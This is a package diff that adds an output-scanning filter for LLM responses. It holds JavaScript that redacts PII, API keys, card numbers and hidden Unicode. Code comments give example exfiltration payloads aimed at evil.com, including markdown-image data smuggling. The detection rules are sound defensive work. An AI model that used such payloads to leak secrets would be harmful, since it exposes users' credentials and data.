@sandrobuilds/tracerney 0.9.22 → 0.9.23

package/dist/domain/pii/DeterministicFilter.js

@@ -0,0 +1,151 @@
+/**
+ * Deterministic Filter
+ * Domain service: Layer 1 outbound intelligent gatekeeper.
+ *
+ * Philosophy — The SDK is a HIGH-PRECISION SENSOR, not a policy enforcer.
+ *
+ * Every match is surfaced as a SuspiciousTrace. The developer owns the reaction:
+ *
+ *   const trace = tracerney.validate(agentOutput);
+ *
+ *   if (trace.isSuspicious) {
+ *     console.log(`Alert: ${trace.reason}`);
+ *
+ *     // Option A: Hard Block
+ *     // throw new Error("Security Policy Violation");
+ *
+ *     // Option B: Surgical Scrub
+ *     // return trace.redactedContent;
+ *   }
+ *
+ * See the "Suspicious Manifest" in PIIPattern.ts for the label-to-action guide.
+ *
+ * Pure synchronous — no I/O, no async. Target latency <5ms.
+ */
+import { PII_PATTERNS, CATEGORY_TO_LABEL, LABEL_PRIORITY, } from './PIIPattern.js';
+// ─── Service ──────────────────────────────────────────────────────────────────
+export class DeterministicFilter {
+    constructor(patterns = PII_PATTERNS) {
+        this.patterns = patterns;
+    }
+    /**
+     * Scan a plain string and return a SuspiciousTrace.
+     * Always returns — never throws. The caller decides what to do.
+     */
+    validate(text) {
+        if (!text || typeof text !== "string") {
+            return {
+                isSuspicious: false,
+                label: null,
+                reason: "Clean",
+                redactedContent: text ?? "",
+                findings: [],
+            };
+        }
+        let redacted = text;
+        const findings = [];
+        for (const p of this.patterns) {
+            p.pattern.lastIndex = 0;
+            const matches = redacted.match(p.pattern);
+            if (!matches || matches.length === 0)
+                continue;
+            p.pattern.lastIndex = 0;
+            redacted = redacted.replace(p.pattern, p.redactAs);
+            findings.push({
+                patternId: p.id,
+                patternName: p.name,
+                category: p.category,
+                label: CATEGORY_TO_LABEL[p.category],
+                count: matches.length,
+            });
+        }
+        if (findings.length === 0) {
+            return {
+                isSuspicious: false,
+                label: null,
+                reason: "Clean",
+                redactedContent: text,
+                findings: [],
+            };
+        }
+        // Derive the highest-severity label across all findings
+        const dominantLabel = findings.reduce((best, f) => {
+            return LABEL_PRIORITY[f.label] > LABEL_PRIORITY[best] ? f.label : best;
+        }, findings[0].label);
+        const reason = `Detected ${findings.length} finding(s): ${findings.map((f) => f.patternName).join(", ")}`;
+        return {
+            isSuspicious: true,
+            label: dominantLabel,
+            reason,
+            redactedContent: redacted,
+            findings,
+        };
+    }
+    /**
+     * Scan all text content in an LLMResponse.
+     * Returns a merged SuspiciousTrace (highest label across all choices)
+     * and a new response with redactedContent applied — never mutates the original.
+     */
+    filterResponse(response) {
+        if (!response?.choices?.length) {
+            const cleanTrace = {
+                isSuspicious: false,
+                label: null,
+                reason: "Clean",
+                redactedContent: "",
+                findings: [],
+            };
+            return { response, outcome: { trace: cleanTrace } };
+        }
+        const allFindings = [];
+        let anyRedacted = false;
+        const sanitizedChoices = [];
+        for (const choice of response.choices) {
+            const content = choice.message?.content;
+            if (!content) {
+                sanitizedChoices.push(choice);
+                continue;
+            }
+            const trace = this.validate(content);
+            if (trace.isSuspicious) {
+                anyRedacted = true;
+                allFindings.push(...trace.findings);
+                sanitizedChoices.push({
+                    ...choice,
+                    message: { ...choice.message, content: trace.redactedContent },
+                });
+            }
+            else {
+                sanitizedChoices.push(choice);
+            }
+        }
+        const sanitizedResponse = anyRedacted
+            ? { ...response, choices: sanitizedChoices }
+            : response;
+        if (allFindings.length === 0) {
+            const cleanTrace = {
+                isSuspicious: false,
+                label: null,
+                reason: "Clean",
+                redactedContent: "",
+                findings: [],
+            };
+            return { response: sanitizedResponse, outcome: { trace: cleanTrace } };
+        }
+        const dominantLabel = allFindings.reduce((best, f) => {
+            return LABEL_PRIORITY[f.label] > LABEL_PRIORITY[best] ? f.label : best;
+        }, allFindings[0].label);
+        const mergedTrace = {
+            isSuspicious: true,
+            label: dominantLabel,
+            reason: `Detected ${allFindings.length} finding(s): ${allFindings.map((f) => f.patternName).join(", ")}`,
+            redactedContent: "",
+            findings: allFindings,
+        };
+        return {
+            response: sanitizedResponse,
+            outcome: { trace: mergedTrace, redactedResponse: sanitizedResponse },
+        };
+    }
+}
+//# sourceMappingURL=DeterministicFilter.js.map

package/dist/domain/pii/DeterministicFilter.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"DeterministicFilter.js","sourceRoot":"","sources":["../../../src/domain/pii/DeterministicFilter.ts"],"names":[],"mappings":"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"}

package/dist/domain/pii/PIIPattern.d.ts

@@ -0,0 +1,41 @@
+/**
+ * PII Pattern
+ * Domain value object: immutable pattern definitions for Layer 1 outbound filtering.
+ *
+ * The SDK is a HIGH-PRECISION SENSOR. It does not guess the developer's intent.
+ * Every match is labeled SUSPICIOUS with a specific SuspiciousLabel.
+ * The developer decides the reaction: redact, block, or audit.
+ *
+ * The "Suspicious" Manifest:
+ * ┌──────────────────┬────────────────────────┬───────────────────────┐
+ * │ Trigger          │ Label                  │ Developer's Action    │
+ * ├──────────────────┼────────────────────────┼───────────────────────┤
+ * │ Email / Phone    │ SUSPICIOUS_PII         │ Usually Redact        │
+ * │ API / SSH Keys   │ SUSPICIOUS_SECRET      │ Usually Block         │
+ * │ External URL     │ SUSPICIOUS_EGRESS      │ Always Block          │
+ * │ ASCII / Unicode  │ SUSPICIOUS_ENCODING    │ Audit / Block         │
+ * └──────────────────┴────────────────────────┴───────────────────────┘
+ *
+ * All regex patterns carry the global flag so String.replace replaces every match.
+ */
+export type PIICategory = "email" | "phone" | "credit_card" | "ssn" | "api_key" | "ssh_private_key" | "egress_url_smuggling" | "egress_credential_url" | "egress_base64_url" | "encoding_zero_width" | "encoding_direction_override" | "encoding_base64_blob";
+/**
+ * Semantic label surfaced on every SuspiciousTrace.
+ * Maps directly to the "Suspicious Manifest" table — developer uses this to route decisions.
+ */
+export type SuspiciousLabel = "SUSPICIOUS_PII" | "SUSPICIOUS_SECRET" | "SUSPICIOUS_EGRESS" | "SUSPICIOUS_ENCODING";
+/** Maps each category to its semantic label */
+export declare const CATEGORY_TO_LABEL: Readonly<Record<PIICategory, SuspiciousLabel>>;
+/** Priority order for label escalation (highest wins when multiple labels fire) */
+export declare const LABEL_PRIORITY: Readonly<Record<SuspiciousLabel, number>>;
+export interface PIIPattern {
+    readonly id: string;
+    readonly name: string;
+    /** Must carry the global flag — String.replace relies on it */
+    readonly pattern: RegExp;
+    readonly category: PIICategory;
+    /** Token to substitute in the pre-computed redactedContent */
+    readonly redactAs: string;
+}
+export declare const PII_PATTERNS: readonly PIIPattern[];
+//# sourceMappingURL=PIIPattern.d.ts.map

package/dist/domain/pii/PIIPattern.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"PIIPattern.d.ts","sourceRoot":"","sources":["../../../src/domain/pii/PIIPattern.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;GAmBG;AAEH,MAAM,MAAM,WAAW,GACnB,OAAO,GACP,OAAO,GACP,aAAa,GACb,KAAK,GACL,SAAS,GACT,iBAAiB,GACjB,sBAAsB,GACtB,uBAAuB,GACvB,mBAAmB,GACnB,qBAAqB,GACrB,6BAA6B,GAC7B,sBAAsB,CAAC;AAE3B;;;GAGG;AACH,MAAM,MAAM,eAAe,GACvB,gBAAgB,GAChB,mBAAmB,GACnB,mBAAmB,GACnB,qBAAqB,CAAC;AAE1B,+CAA+C;AAC/C,eAAO,MAAM,iBAAiB,EAAE,QAAQ,CAAC,MAAM,CAAC,WAAW,EAAE,eAAe,CAAC,CAa5E,CAAC;AAEF,mFAAmF;AACnF,eAAO,MAAM,cAAc,EAAE,QAAQ,CAAC,MAAM,CAAC,eAAe,EAAE,MAAM,CAAC,CAKpE,CAAC;AAEF,MAAM,WAAW,UAAU;IACzB,QAAQ,CAAC,EAAE,EAAE,MAAM,CAAC;IACpB,QAAQ,CAAC,IAAI,EAAE,MAAM,CAAC;IACtB,+DAA+D;IAC/D,QAAQ,CAAC,OAAO,EAAE,MAAM,CAAC;IACzB,QAAQ,CAAC,QAAQ,EAAE,WAAW,CAAC;IAC/B,8DAA8D;IAC9D,QAAQ,CAAC,QAAQ,EAAE,MAAM,CAAC;CAC3B;AAuND,eAAO,MAAM,YAAY,EAAE,SAAS,UAAU,EAK7C,CAAC"}

package/dist/domain/pii/PIIPattern.js

@@ -0,0 +1,253 @@
+/**
+ * PII Pattern
+ * Domain value object: immutable pattern definitions for Layer 1 outbound filtering.
+ *
+ * The SDK is a HIGH-PRECISION SENSOR. It does not guess the developer's intent.
+ * Every match is labeled SUSPICIOUS with a specific SuspiciousLabel.
+ * The developer decides the reaction: redact, block, or audit.
+ *
+ * The "Suspicious" Manifest:
+ * ┌──────────────────┬────────────────────────┬───────────────────────┐
+ * │ Trigger          │ Label                  │ Developer's Action    │
+ * ├──────────────────┼────────────────────────┼───────────────────────┤
+ * │ Email / Phone    │ SUSPICIOUS_PII         │ Usually Redact        │
+ * │ API / SSH Keys   │ SUSPICIOUS_SECRET      │ Usually Block         │
+ * │ External URL     │ SUSPICIOUS_EGRESS      │ Always Block          │
+ * │ ASCII / Unicode  │ SUSPICIOUS_ENCODING    │ Audit / Block         │
+ * └──────────────────┴────────────────────────┴───────────────────────┘
+ *
+ * All regex patterns carry the global flag so String.replace replaces every match.
+ */
+/** Maps each category to its semantic label */
+export const CATEGORY_TO_LABEL = {
+    email: "SUSPICIOUS_PII",
+    phone: "SUSPICIOUS_PII",
+    credit_card: "SUSPICIOUS_SECRET",
+    ssn: "SUSPICIOUS_SECRET",
+    api_key: "SUSPICIOUS_SECRET",
+    ssh_private_key: "SUSPICIOUS_SECRET",
+    egress_url_smuggling: "SUSPICIOUS_EGRESS",
+    egress_credential_url: "SUSPICIOUS_EGRESS",
+    egress_base64_url: "SUSPICIOUS_EGRESS",
+    encoding_zero_width: "SUSPICIOUS_ENCODING",
+    encoding_direction_override: "SUSPICIOUS_ENCODING",
+    encoding_base64_blob: "SUSPICIOUS_ENCODING",
+};
+/** Priority order for label escalation (highest wins when multiple labels fire) */
+export const LABEL_PRIORITY = {
+    SUSPICIOUS_EGRESS: 3,
+    SUSPICIOUS_SECRET: 2,
+    SUSPICIOUS_ENCODING: 1,
+    SUSPICIOUS_PII: 0,
+};
+// ─── SUSPICIOUS_EGRESS ────────────────────────────────────────────────────────
+const EGRESS_PATTERNS = [
+    {
+        id: "pii-egress-001",
+        name: "Markdown Image with URL Query Params (Data Smuggling)",
+        // ![x](https://evil.com/log.png?config={"db_pass":"secret"})
+        pattern: /!\[[^\]]*\]\(https?:\/\/[^\s)]*\?[^\s)]+\)/gi,
+        category: "egress_url_smuggling",
+        redactAs: "[SUSPICIOUS_EGRESS:MARKDOWN_IMAGE_SMUGGLING]",
+    },
+    {
+        id: "pii-egress-002",
+        name: "Markdown Link with URL Query Params (Data Smuggling)",
+        // [click](https://evil.com?data=secret)
+        pattern: /(?<!!)\[[^\]]*\]\(https?:\/\/[^\s)]*\?[^\s)]+\)/gi,
+        category: "egress_url_smuggling",
+        redactAs: "[SUSPICIOUS_EGRESS:MARKDOWN_LINK_SMUGGLING]",
+    },
+    {
+        id: "pii-egress-003",
+        name: "Credential-Embedded URL",
+        // https://user:password@hostname
+        pattern: /https?:\/\/[A-Za-z0-9._%-]+:[A-Za-z0-9._~!$&'()*+,;=%-]+@[A-Za-z0-9.-]+/gi,
+        category: "egress_credential_url",
+        redactAs: "[SUSPICIOUS_EGRESS:CREDENTIAL_URL]",
+    },
+    {
+        id: "pii-egress-004",
+        name: "Base64 Blob in URL Parameter",
+        // ?param=<80+ base64 chars> — encodes data for exfiltration via tracking pixels
+        pattern: /[?&][A-Za-z0-9_%-]+=(?:[A-Za-z0-9+/]{80,}={0,2})/g,
+        category: "egress_base64_url",
+        redactAs: "[SUSPICIOUS_EGRESS:BASE64_URL_PAYLOAD]",
+    },
+];
+// ─── SUSPICIOUS_ENCODING ──────────────────────────────────────────────────────
+const ENCODING_PATTERNS = [
+    {
+        id: "pii-enc-001",
+        name: "Zero-Width Characters",
+        // Invisible Unicode used to watermark, fingerprint, or smuggle hidden data
+        pattern: /[\u200B\u200C\u200D\uFEFF\u2060]+/g,
+        category: "encoding_zero_width",
+        redactAs: "[SUSPICIOUS_ENCODING:ZERO_WIDTH_CHARS]",
+    },
+    {
+        id: "pii-enc-002",
+        name: "Unicode Bidirectional Override",
+        // LRE/RLE/PDF/LRO/RLO and newer isolate/pop chars — used to reverse text visually
+        pattern: /[\u202A-\u202E\u2066-\u2069]+/g,
+        category: "encoding_direction_override",
+        redactAs: "[SUSPICIOUS_ENCODING:BIDI_OVERRIDE]",
+    },
+    {
+        id: "pii-enc-003",
+        name: "Standalone Base64 Blob (≥120 chars)",
+        // A large base64 block outside of a URL — likely encoded payload or data exfil
+        pattern: /(?<![A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4}){30,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?(?![A-Za-z0-9+/=])/g,
+        category: "encoding_base64_blob",
+        redactAs: "[SUSPICIOUS_ENCODING:BASE64_BLOB]",
+    },
+];
+// ─── SUSPICIOUS_SECRET ────────────────────────────────────────────────────────
+const SECRET_PATTERNS = [
+    {
+        id: "pii-ssh-001",
+        name: "SSH/PEM Private Key Block",
+        pattern: /-----BEGIN (?:RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----[\s\S]*?-----END (?:RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----/gi,
+        category: "ssh_private_key",
+        redactAs: "[SUSPICIOUS_SECRET:SSH_PRIVATE_KEY]",
+    },
+    {
+        id: "pii-apikey-001",
+        name: "Anthropic API Key",
+        pattern: /sk-ant-api0[0-9]+-[A-Za-z0-9_-]{32,}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:ANTHROPIC_API_KEY]",
+    },
+    {
+        id: "pii-apikey-002",
+        name: "OpenAI API Key",
+        pattern: /sk-(?:proj-)?[A-Za-z0-9]{32,}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:OPENAI_API_KEY]",
+    },
+    {
+        id: "pii-apikey-003",
+        name: "Stripe Live Secret Key",
+        pattern: /sk_live_[A-Za-z0-9]{24,}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:STRIPE_SECRET_KEY]",
+    },
+    {
+        id: "pii-apikey-004",
+        name: "Stripe Live Restricted Key",
+        pattern: /rk_live_[A-Za-z0-9]{24,}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:STRIPE_RESTRICTED_KEY]",
+    },
+    {
+        id: "pii-apikey-005",
+        name: "GitHub Personal Access Token (classic)",
+        pattern: /ghp_[A-Za-z0-9]{36}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:GITHUB_TOKEN]",
+    },
+    {
+        id: "pii-apikey-006",
+        name: "GitHub Personal Access Token (fine-grained)",
+        pattern: /github_pat_[A-Za-z0-9_]{82}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:GITHUB_TOKEN]",
+    },
+    {
+        id: "pii-apikey-007",
+        name: "AWS Access Key ID",
+        pattern: /\bAKIA[0-9A-Z]{16}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:AWS_ACCESS_KEY]",
+    },
+    {
+        id: "pii-apikey-008",
+        name: "Google API Key",
+        pattern: /\bAIza[0-9A-Za-z_-]{35}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:GOOGLE_API_KEY]",
+    },
+    {
+        id: "pii-apikey-009",
+        name: "Slack Token",
+        pattern: /\bxox[baprs]-[0-9A-Za-z-]{10,}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:SLACK_TOKEN]",
+    },
+    {
+        id: "pii-apikey-010",
+        name: "SendGrid API Key",
+        pattern: /\bSG\.[A-Za-z0-9_-]{22}\.[A-Za-z0-9_-]{43}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:SENDGRID_API_KEY]",
+    },
+    {
+        id: "pii-apikey-011",
+        name: "Twilio API Key",
+        pattern: /\bSK[0-9a-fA-F]{32}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:TWILIO_API_KEY]",
+    },
+    {
+        id: "pii-cc-001",
+        name: "Visa Card Number",
+        pattern: /\b4[0-9]{3}[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}\b/g,
+        category: "credit_card",
+        redactAs: "[SUSPICIOUS_SECRET:CREDIT_CARD]",
+    },
+    {
+        id: "pii-cc-002",
+        name: "Mastercard Number",
+        pattern: /\b(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}\b/g,
+        category: "credit_card",
+        redactAs: "[SUSPICIOUS_SECRET:CREDIT_CARD]",
+    },
+    {
+        id: "pii-cc-003",
+        name: "Amex Card Number",
+        pattern: /\b3[47][0-9]{2}[- ]?[0-9]{6}[- ]?[0-9]{5}\b/g,
+        category: "credit_card",
+        redactAs: "[SUSPICIOUS_SECRET:CREDIT_CARD]",
+    },
+    {
+        id: "pii-cc-004",
+        name: "Discover Card Number",
+        pattern: /\b6(?:011|5[0-9]{2})[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}\b/g,
+        category: "credit_card",
+        redactAs: "[SUSPICIOUS_SECRET:CREDIT_CARD]",
+    },
+    {
+        id: "pii-ssn-001",
+        name: "US Social Security Number",
+        pattern: /(?<!\d)\d{3}-\d{2}-\d{4}(?!\d)/g,
+        category: "ssn",
+        redactAs: "[SUSPICIOUS_SECRET:SSN]",
+    },
+];
+// ─── SUSPICIOUS_PII ───────────────────────────────────────────────────────────
+const PII_PATTERNS_LOW = [
+    {
+        id: "pii-email-001",
+        name: "Email Address",
+        pattern: /\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/g,
+        category: "email",
+        redactAs: "[SUSPICIOUS_PII:EMAIL]",
+    },
+    {
+        id: "pii-phone-001",
+        name: "US Phone Number",
+        pattern: /(?<!\d)(?:\+1[-.\s]?)?\(?[2-9][0-9]{2}\)?[-.\s][0-9]{3}[-.\s][0-9]{4}(?!\d)/g,
+        category: "phone",
+        redactAs: "[SUSPICIOUS_PII:PHONE]",
+    },
+];
+// ─── Canonical ordered set ────────────────────────────────────────────────────
+// Scan order: EGRESS → ENCODING → SECRET → PII
+// Highest-severity patterns first so the label reflects the worst finding.
+export const PII_PATTERNS = [
+    ...EGRESS_PATTERNS,
+    ...ENCODING_PATTERNS,
+    ...SECRET_PATTERNS,
+    ...PII_PATTERNS_LOW,
+];
+//# sourceMappingURL=PIIPattern.js.map

package/dist/domain/pii/PIIPattern.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"PIIPattern.js","sourceRoot":"","sources":["../../../src/domain/pii/PIIPattern.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;GAmBG;AA0BH,+CAA+C;AAC/C,MAAM,CAAC,MAAM,iBAAiB,GAAmD;IAC/E,KAAK,EAAuB,gBAAgB;IAC5C,KAAK,EAAuB,gBAAgB;IAC5C,WAAW,EAAiB,mBAAmB;IAC/C,GAAG,EAAyB,mBAAmB;IAC/C,OAAO,EAAqB,mBAAmB;IAC/C,eAAe,EAAa,mBAAmB;IAC/C,oBAAoB,EAAQ,mBAAmB;IAC/C,qBAAqB,EAAO,mBAAmB;IAC/C,iBAAiB,EAAW,mBAAmB;IAC/C,mBAAmB,EAAS,qBAAqB;IACjD,2BAA2B,EAAC,qBAAqB;IACjD,oBAAoB,EAAQ,qBAAqB;CAClD,CAAC;AAEF,mFAAmF;AACnF,MAAM,CAAC,MAAM,cAAc,GAA8C;IACvE,iBAAiB,EAAI,CAAC;IACtB,iBAAiB,EAAI,CAAC;IACtB,mBAAmB,EAAE,CAAC;IACtB,cAAc,EAAO,CAAC;CACvB,CAAC;AAYF,iFAAiF;AAEjF,MAAM,eAAe,GAA0B;IAC7C;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,uDAAuD;QAC7D,6DAA6D;QAC7D,OAAO,EAAE,8CAA8C;QACvD,QAAQ,EAAE,sBAAsB;QAChC,QAAQ,EAAE,8CAA8C;KACzD;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,sDAAsD;QAC5D,wCAAwC;QACxC,OAAO,EAAE,mDAAmD;QAC5D,QAAQ,EAAE,sBAAsB;QAChC,QAAQ,EAAE,6CAA6C;KACxD;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,yBAAyB;QAC/B,iCAAiC;QACjC,OAAO,EAAE,2EAA2E;QACpF,QAAQ,EAAE,uBAAuB;QACjC,QAAQ,EAAE,oCAAoC;KAC/C;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,8BAA8B;QACpC,gFAAgF;QAChF,OAAO,EAAE,mDAAmD;QAC5D,QAAQ,EAAE,mBAAmB;QAC7B,QAAQ,EAAE,wCAAwC;KACnD;CACF,CAAC;AAEF,iFAAiF;AAEjF,MAAM,iBAAiB,GAA0B;IAC/C;QACE,EAAE,EAAE,aAAa;QACjB,IAAI,EAAE,uBAAuB;QAC7B,2EAA2E;QAC3E,OAAO,EAAE,oCAAoC;QAC7C,QAAQ,EAAE,qBAAqB;QAC/B,QAAQ,EAAE,wCAAwC;KACnD;IACD;QACE,EAAE,EAAE,aAAa;QACjB,IAAI,EAAE,gCAAgC;QACtC,kFAAkF;QAClF,OAAO,EAAE,gCAAgC;QACzC,QAAQ,EAAE,6BAA6B;QACvC,QAAQ,EAAE,qCAAqC;KAChD;IACD;QACE,EAAE,EAAE,aAAa;QACjB,IAAI,EAAE,qCAAqC;QAC3C,+EAA+E;QAC/E,OAAO,EAAE,yGAAyG;QAClH,QAAQ,EAAE,sBAAsB;QAChC,QAAQ,EAAE,mCAAmC;KAC9C;CACF,CAAC;AAEF,iFAAiF;AAEjF,MAAM,eAAe,GAA0B;IAC7C;QACE,EAAE,EAAE,aAAa;QACjB,IAAI,EAAE,2BAA2B;QACjC,OAAO,EAAE,sHAAsH;QAC/H,QAAQ,EAAE,iBAAiB;QAC